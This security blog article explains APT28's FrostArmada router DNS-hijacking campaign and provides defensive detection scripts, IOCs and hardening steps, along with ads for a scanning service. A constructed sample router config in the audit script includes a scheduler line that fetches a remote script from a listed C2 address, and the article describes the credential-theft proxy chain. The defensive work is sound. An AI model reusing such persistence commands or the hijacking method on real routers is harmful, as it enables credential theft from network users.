Inside APT28's MikroTik DNS Hijacking Campaign

APT28 hijacked 18,000 routers to steal Microsoft 365 logins. How FrostArmada worked, why MikroTik keeps getting hit, and how to check your own.


In December 2025, more than 18,000 SOHO routers spread across 120 countries were quietly forwarding traffic to servers controlled by Russian military intelligence. Most owners had no idea.

The campaign, tracked as FrostArmada and attributed to APT28 (also known as Forest Blizzard, Fancy Bear, or GRU Unit 26165), targeted MikroTik and TP-Link routers to hijack DNS resolution and steal Microsoft 365 credentials. The FBI publicly disrupted the core infrastructure on April 7, 2026. The problem it exposed is older than the campaign and will outlast it.

Here is what the attack actually did, why MikroTik keeps showing up in reports like this one, and what you should do if you run one.

What Happened

APT28 started compromising SOHO routers at scale in May 2025. By December the operation peaked. Researchers counted more than 18,000 unique hijacked IP addresses across 120 countries, hitting 200+ organizations and around 5,000 consumer devices.

The goal was straightforward. Once a router was under attacker control, they reconfigured its DNS and DHCP settings to point to attacker-run resolvers. From that point onward, every device on the network that asked “where is outlook.office.com?” got an answer picked by APT28.

Not every query was redirected. The malicious resolvers only poisoned specific domains:

  • autodiscover-s.outlook.com
  • imap-mail.outlook.com
  • outlook.live.com
  • outlook.office.com
  • outlook.office365.com

Legitimate answers came back for everything else. Your router looked normal. Your laptop resolved Google and Netflix just fine. Only when somebody on the network hit Microsoft login pages did the trap close. From the client side this is nearly invisible.
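One way to check for exactly this kind of selective poisoning from a client on the LAN is to resolve the five watched names plus a couple of control names through the router's resolver and through a reference resolver, then compare. The script below is an added example, not code from the article or from any of the researchers it cites; it speaks raw DNS over UDP so it can target a specific resolver without extra libraries. The control names, the reference resolver address and the sample response used for offline testing are my own choices.

```python
import socket
import struct

# The five names the article says the malicious resolvers poisoned.
WATCHED = [
    "autodiscover-s.outlook.com",
    "imap-mail.outlook.com",
    "outlook.live.com",
    "outlook.office.com",
    "outlook.office365.com",
]
# Control names a selective hijack answers honestly (my choice, not from the article).
CONTROLS = ["www.google.com", "www.netflix.com"]


def build_query(name, txid=0x1234):
    """Build a minimal DNS query: A record, IN class, recursion desired."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    labels = name.strip(".").split(".")
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"
    return header + qname + struct.pack(">HH", 1, 1)


def skip_name(buf, off):
    """Return the offset just past a (possibly compressed) domain name."""
    while True:
        length = buf[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:      # two-byte compression pointer ends the name
            return off + 2
        off += 1 + length


def parse_a_records(buf):
    """Collect IPv4 addresses from the answer section of a DNS response."""
    _, _, qdcount, ancount, _, _ = struct.unpack(">HHHHHH", buf[:12])
    off = 12
    for _ in range(qdcount):
        off = skip_name(buf, off) + 4            # skip QTYPE and QCLASS
    addrs = []
    for _ in range(ancount):
        off = skip_name(buf, off)
        rtype, _, _, rdlen = struct.unpack(">HHIH", buf[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:            # A record
            addrs.append(socket.inet_ntoa(buf[off:off + 4]))
        off += rdlen                             # CNAMEs and other types are skipped
    return sorted(addrs)


def resolve(name, resolver, timeout=3.0):
    """Ask one specific resolver (e.g. the router's LAN address) over UDP/53."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_query(name), (resolver, 53))
        data, _ = sock.recvfrom(4096)
    return parse_a_records(data)


def selective_poisoning(router_answers, reference_answers):
    """Given {name: [addrs]} from the router's resolver and from a reference
    resolver, return (diverging_watched_names, controls_agree). A selective
    hijack shows up as divergence on WATCHED while CONTROLS agree."""
    controls_agree = all(
        router_answers.get(c) == reference_answers.get(c) for c in CONTROLS
    )
    diverging = [
        n for n in WATCHED if router_answers.get(n) != reference_answers.get(n)
    ]
    return diverging, controls_agree


def build_sample_response(name, addr, txid=0x1234):
    """Constructed response for offline testing: one CNAME plus one A record,
    both using a compression pointer back to the question name."""
    header = struct.pack(">HHHHHH", txid, 0x8180, 1, 2, 0, 0)
    question = build_query(name, txid)[12:]
    cname = b"\x03cdn\x07example\x03com\x00"
    rr_cname = b"\xc0\x0c" + struct.pack(">HHIH", 5, 1, 60, len(cname)) + cname
    rr_a = b"\xc0\x0c" + struct.pack(">HHIH", 1, 1, 60, 4) + socket.inet_aton(addr)
    return header + question + rr_cname + rr_a


def compare_live(router_resolver, reference_resolver="1.1.1.1"):
    """Run the full check against a live network (needs DNS reachability)."""
    names = WATCHED + CONTROLS
    router = {n: resolve(n, router_resolver) for n in names}
    reference = {n: resolve(n, reference_resolver) for n in names}
    return selective_poisoning(router, reference)


if __name__ == "__main__":
    import sys
    # Assumed default: the MikroTik factory LAN address.
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.88.1"
    diverging, agree = compare_live(target)
    print("controls agree:", agree, "diverging:", diverging)
```

One caveat before acting on a divergence: Microsoft's front-door names legitimately return different A records depending on where the query comes from, so two honest resolvers can disagree. Treat a divergence as a prompt to look at which address the router handed back (is it in Microsoft's published ranges, or in the C2 ranges listed later in this article?) rather than as proof on its own.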

The Credential Theft Chain

Once DNS was under attacker control, the actual credential theft used a fairly classic adversary-in-the-middle (AitM) proxy:

  1. User navigates to outlook.office.com.
  2. The poisoned DNS sends them to an attacker-controlled server instead.
  3. That server presents a Microsoft-lookalike login page and captures credentials as they are typed.
  4. The attacker proxies the authentication back through the real Microsoft endpoint, capturing the session cookie, OAuth tokens, and any bearer tokens along the way.
  5. The victim sees their Outlook inbox load and moves on with their day.

The only client-side indicator some users saw was a browser warning about an untrusted certificate, the one presented by the AitM proxy. Most corporate users who see that kind of warning click through it because they see the same thing every time their own firewall does TLS inspection.

Once APT28 had a valid session cookie, MFA did not help. They pulled mail, attachments, calendar entries, and contacts straight from the mailbox using the stolen token. Several compromised accounts belonged to ministries of foreign affairs, law enforcement agencies, and defense contractors. This was a signals intelligence operation running on top of consumer-grade networking equipment.

Technical Fingerprints

The compromised routers had reasonably specific signatures that network defenders flagged:

  • dnsmasq 2.85 listening on UDP 53
  • SSH on TCP 56777 and TCP 35681 (custom ports used for attacker access)
  • Selective DNS poisoning as described above

If you scan a router and find SSH answering on 56777, that is not a coincidence. MikroTik defaults to SSH on port 22. A five-digit SSH port on a device nobody remembers configuring is a strong indicator somebody else made that choice.

The reported C2 ranges included:

  • 5.226.137.151-245
  • 37.221.64.77-254
  • 77.83.197.37-60
  • 79.141.160-173.x
  • 185.117.88-89.x
  • 185.237.166.55-249

If your firewall logs show any internal device talking to those ranges, treat it as a probable compromise until you can prove otherwise.
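The ranges above are written in a mixed shorthand (a range in the last octet, or a range in the third octet with `x` for any fourth octet). The following added example, which is mine and not part of the article, turns that shorthand into per-octet bounds and sweeps firewall log lines for any address inside them. The sample log lines are constructed to resemble RouterOS firewall log output and are not real captures.

```python
import re

# C2 ranges exactly as the article lists them, in its own shorthand:
#   "a.b.c.d-e"  -> last octet between d and e
#   "a.b.c-d.x"  -> third octet between c and d, any fourth octet
C2_RANGES = [
    "5.226.137.151-245",
    "37.221.64.77-254",
    "77.83.197.37-60",
    "79.141.160-173.x",
    "185.117.88-89.x",
    "185.237.166.55-249",
]

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def parse_range(spec):
    """Translate one shorthand spec into four (lo, hi) octet bounds."""
    bounds = []
    for part in spec.split("."):
        if part == "x":
            bounds.append((0, 255))
        elif "-" in part:
            lo, hi = part.split("-", 1)
            bounds.append((int(lo), int(hi)))
        else:
            bounds.append((int(part), int(part)))
    if len(bounds) != 4:
        raise ValueError(f"bad range spec: {spec}")
    return tuple(bounds)


C2_BOUNDS = [parse_range(r) for r in C2_RANGES]


def in_c2_range(ip):
    """True if a dotted-quad address falls inside any listed C2 range."""
    octets = [int(o) for o in ip.split(".")]
    if len(octets) != 4:
        return False
    return any(
        all(lo <= o <= hi for o, (lo, hi) in zip(octets, bounds))
        for bounds in C2_BOUNDS
    )


def scan_log(lines):
    """Return (line_number, ip) for every C2 address found in the lines."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for ip in IPV4_RE.findall(line):
            if in_c2_range(ip):
                hits.append((number, ip))
    return hits


# Constructed sample in the style of RouterOS firewall logging; not real traffic.
SAMPLE_LOG = [
    "jan/14 09:12:03 firewall,info forward: in:bridge out:ether1, proto TCP (SYN), "
    "192.168.88.20:51922->5.226.137.200:443, len 60",
    "jan/14 09:12:04 firewall,info forward: in:bridge out:ether1, proto TCP (SYN), "
    "192.168.88.20:53011->142.250.72.100:443, len 60",
    "jan/14 09:12:09 firewall,info forward: in:bridge out:ether1, proto UDP, "
    "192.168.88.1:40012->79.141.170.9:53, len 70",
    "jan/14 09:12:11 firewall,info forward: in:bridge out:ether1, proto TCP (SYN), "
    "192.168.88.30:44100->185.117.90.5:443, len 60",
]


if __name__ == "__main__":
    for number, ip in scan_log(SAMPLE_LOG):
        print(f"line {number}: contact with C2 range address {ip}")
```

Point `scan_log` at the output of `/log print` (or at a syslog export, since RouterOS can ship logs to a remote syslog host) and every hit is a device to pull off the network and image, per the article's advice above. The per-octet matching is deliberately literal to the article's notation; if you maintain the list in CIDR form, `ipaddress.ip_network` is the better tool.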

Why MikroTik Keeps Getting Hit

APT28 did not pick MikroTik because the platform is weaker than its competitors. They picked it because a large, lightly managed, internet-exposed population of these devices exists, which is the same reason TrickBot, VPNFilter, and the Slingshot APT targeted MikroTik before them.

A few reasons this keeps happening:

Management interfaces exposed to the internet. RouterOS has several management surfaces: Winbox (TCP 8291), the WebFig HTTP(S) panel, SSH, Telnet, the API service (TCP 8728), and FTP. Plenty of small offices and home setups leave one or more of these reachable from the public internet, often by accident. Shodan regularly indexes hundreds of thousands of Winbox listeners worldwide.

Outdated firmware. RouterOS updates require a manual decision from the admin. Devices installed five years ago tend to still be running whatever version shipped five years ago. CVE-2018-14847, a credential leak fixed in RouterOS 6.42 back in 2018, still finds victims in 2026 because those devices were never patched.

Default or weak credentials. Older RouterOS versions shipped with an admin account that had no password at all. Plenty of those devices are still online. Where passwords exist, they are often trivially guessable.

Complex capabilities in a small box. RouterOS is effectively a full Linux distribution with scripting, scheduling, and containerization. That power is great when you are the admin. It is also great when you are APT28 dropping a persistent SOCKS proxy, a cron job, and a DNS override into a compromised box.

MikroTik publishes patches and advisories promptly. The issue is the install base. A router is something most people set up once and never look at again.

The FBI Disruption and What It Did Not Fix

On April 7, 2026, the FBI announced a court-authorized technical operation that reached into compromised routers and reversed the malicious DNS configuration, pointing the devices back at legitimate ISP resolvers. This is the same general approach used in earlier cleanup operations against VPNFilter and Cyclops Blink.

That is useful. It is also a one-time fix, and there were several things it could not do:

  • It did not patch the underlying vulnerability or weak credential that let APT28 in the first time.
  • It did not change admin passwords on the affected routers.
  • It did not close exposed management interfaces.
  • It did not remove any secondary backdoors that may have been dropped beyond the DNS config.

If you were one of the 18,000, your DNS is clean as of last week. Your router is still running the same firmware with the same exposed services and the same password it had when APT28 walked in. Expect the next opportunistic actor to try the same door.

How to Check Your Own Router

If you run a MikroTik box (and most of the advice generalizes to any SOHO router):

1. Check what is exposed to the internet.

Your public IP should not answer on Winbox, WebFig, SSH, Telnet, FTP, or the RouterOS API. From an external network (a phone tethered to mobile data works fine), try connecting to your public IP on ports 8291, 80, 443, 22, 23, 21, and 8728. Anything that responds is a problem.

For a broader check that covers all 65535 ports and cross-references known CVE fingerprints, Sentinel scans your public IP and delivers an AI-written report in about thirty minutes. Free, no account required. This is the same kind of perimeter visibility that would have shown most FrostArmada victims they had Winbox or SSH exposed months before anyone at APT28 got around to them. For a home-network-focused walkthrough, see our home network scan guide.

2. Audit DNS and DHCP settings on the router.

Log in through the local interface. Check the DNS server list:

/ip dns print

Check the DHCP server configuration:

/ip dhcp-server network print

Anything pointing at an IP you do not recognize is suspicious. Compare with your ISP’s documented resolvers or a known public resolver like Cloudflare (1.1.1.1) or Google (8.8.8.8).

3. List all scheduled scripts and jobs.

/system scheduler print
/system script print

A clean router typically has nothing or a small number of admin-defined entries. If you see scheduled tasks with names you do not recognize, fetch commands, or scripts that call out to an IP address, you have a problem.

4. Check for unusual users.

/user print

Extra admin-level accounts that you did not create are a classic persistence mechanism.

5. Patch the firmware.

/system routerboard print
/system package update check-for-updates

Run the latest stable RouterOS in the long-term release channel for your platform. If your device is end-of-life and no longer receiving updates, replace it. There is no workaround for unpatchable firmware.

6. Rotate credentials.

Assume the current password is known to someone else. Change the admin password, remove any default accounts, and apply IP restrictions on the admin users so they can only log in from your internal network. Use keys for SSH and disable password authentication.

7. If you find anything suspicious, reset to factory defaults.

A compromised router cannot be fully trusted after the fact. APT28 and others drop persistence mechanisms that do not always show up in the obvious configuration trees. Netinstall the latest firmware, configure from scratch, and do not restore from a pre-compromise backup.
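Steps 2 through 4 and the SSH-port point from the fingerprints section can be automated for a fleet. The following is an added example of mine, not a tool from the article or from MikroTik: it parses the output of `/export verbose` (which, unlike the `print` commands above, lists every setting in a uniform `add`/`set key=value` form) and flags resolvers outside an allowlist, DHCP leases that hand out an unknown resolver, management services on non-default ports or without an `address=` restriction, scheduler or script entries that fetch or call an IP literal, and user accounts not on an expected list. The sample export is constructed to look like a compromised router and is not a real device's configuration; the default service ports are RouterOS's documented defaults.

```python
import re
import shlex

# Documented RouterOS default ports for the management services.
DEFAULT_PORTS = {
    "ssh": 22, "telnet": 23, "ftp": 21, "www": 80, "www-ssl": 443,
    "api": 8728, "api-ssl": 8729, "winbox": 8291,
}
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def parse_export(text):
    """Parse `/export` output into (section, verb, positional_args, {key: value}).
    A line ending in a backslash continues on the next line (RouterOS wraps long
    lines that way); the join adds a space so tokens never run together."""
    entries, section, pending = [], None, ""
    for raw in text.splitlines():
        stripped = raw.strip()
        if stripped.endswith("\\"):
            pending += stripped[:-1] + " "
            continue
        line = pending + stripped
        pending = ""
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):
            section = line
            continue
        tokens = shlex.split(line)
        args = [t for t in tokens[1:] if "=" not in t]
        kv = dict(t.split("=", 1) for t in tokens[1:] if "=" in t)
        entries.append((section, tokens[0], args, kv))
    return entries


def audit(entries, trusted_resolvers, expected_users):
    """Return a list of human-readable findings for the checks in steps 2-4 and 6."""
    findings = []
    # A DHCP network that hands out the router's own gateway address as DNS is normal.
    gateways = {kv.get("gateway") for sec, _, _, kv in entries
                if sec == "/ip dhcp-server network"}
    for section, verb, args, kv in entries:
        if section == "/ip dns" and "servers" in kv:
            for srv in kv["servers"].split(","):
                if srv not in trusted_resolvers:
                    findings.append(f"dns: untrusted resolver {srv}")
        elif section == "/ip dhcp-server network" and "dns-server" in kv:
            for srv in kv["dns-server"].split(","):
                if srv not in trusted_resolvers and srv not in gateways:
                    findings.append(f"dhcp: leases hand out resolver {srv}")
        elif section == "/ip service":
            name = args[0] if args else kv.get("name")
            if name in DEFAULT_PORTS:
                port = int(kv.get("port", DEFAULT_PORTS[name]))
                if port != DEFAULT_PORTS[name]:
                    findings.append(f"service: {name} moved to port {port} "
                                    f"(default {DEFAULT_PORTS[name]})")
                if kv.get("disabled", "no") == "no" and not kv.get("address"):
                    findings.append(f"service: {name} enabled with no address restriction")
        elif section in ("/system scheduler", "/system script"):
            body = kv.get("on-event", "") + " " + kv.get("source", "")
            if "fetch" in body or IPV4_RE.search(body):
                findings.append(f"{section}: entry {kv.get('name')} fetches or calls an IP literal")
        elif section == "/user":
            name = kv.get("name") or (args[0] if args else None)
            if name not in expected_users:
                findings.append(f"user: unexpected account {name} (group {kv.get('group')})")
    return findings


# Constructed sample mimicking `/export verbose` on a hijacked router; not a real config.
SAMPLE_EXPORT = """\
# constructed sample, not a real device
/ip dns
set allow-remote-requests=yes servers=5.226.137.200
/ip dhcp-server network
add address=192.168.88.0/24 dns-server=5.226.137.200 gateway=192.168.88.1
/ip service
set ssh address="" disabled=no port=56777
set winbox address=192.168.88.0/24 disabled=no port=8291
set www address="" disabled=no port=80
/system scheduler
add interval=1d name=sync on-event="/tool fetch url=http://5.226.137.200/a.rsc \\
    mode=http" policy=ftp,read,write,test start-time=startup
/user
add group=full name=admin
add group=full name=support
"""


if __name__ == "__main__":
    for finding in audit(parse_export(SAMPLE_EXPORT), {"1.1.1.1", "8.8.8.8"}, {"admin"}):
        print(finding)
```

Feed it a real export with `/export verbose file=audit` followed by a fetch of the `.rsc` file, and tune `trusted_resolvers` to your ISP's documented resolvers or the public ones named in step 2. The parser is tolerant of entries it does not understand (interface lists, firewall rules) because it only reads the sections the checks care about, so it is safe to hand it a full export.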

What Organizations Should Do Differently

If you run routers like these across a fleet (branch offices, managed service customers, IoT deployments), the single largest improvement is visibility into what is actually exposed externally. Most compromised SOHO routers are not compromised because of a zero-day. They are compromised because nobody audited the management surface.

A recurring external scan of your public IP space catches this. So does certificate pinning on managed devices, which means an AitM proxy cannot silently decrypt Microsoft 365 traffic even when DNS is poisoned. Centralized DNS resolution (forcing endpoints to use a known good resolver instead of whatever DHCP hands them) removes the DNS hijack payoff entirely for the devices you manage.

None of this is new advice. The FrostArmada victims almost all had one or more of these gaps for years before APT28 showed up.

The Broader Pattern

APT28 is not the only group doing this. The commodity MikroTik botnet written up in January 2025 (around 13,000 devices running SOCKS4 proxies and relaying malspam) is still out there. Infoblox has documented separate Russian-speaking botnets built on the same hardware with DNS misconfiguration as the entry point. Smaller campaigns come and go constantly.

For a reader running a single home MikroTik, this is mostly a motivation to audit the box and patch it. For anyone running critical infrastructure, the lesson is that routers are computers, and unmanaged computers exposed to the internet get compromised on a timeline measured in weeks. If the device has not been reviewed since it was unboxed, it is a candidate for something.

The interesting part of FrostArmada is not that APT28 ran it. It is that the operation ran for eight months at 18,000-IP scale before anyone disrupted it. That is a long time to be somebody else’s signals intelligence platform.


If you want to see what your own public IP looks like to a scanner like the ones APT28 used for reconnaissance, Sentinel runs the check and sends back a report with specific findings and fixes. Free, no account, about thirty minutes. The same visibility that would have flagged most FrostArmada exposures a year before anyone got to them.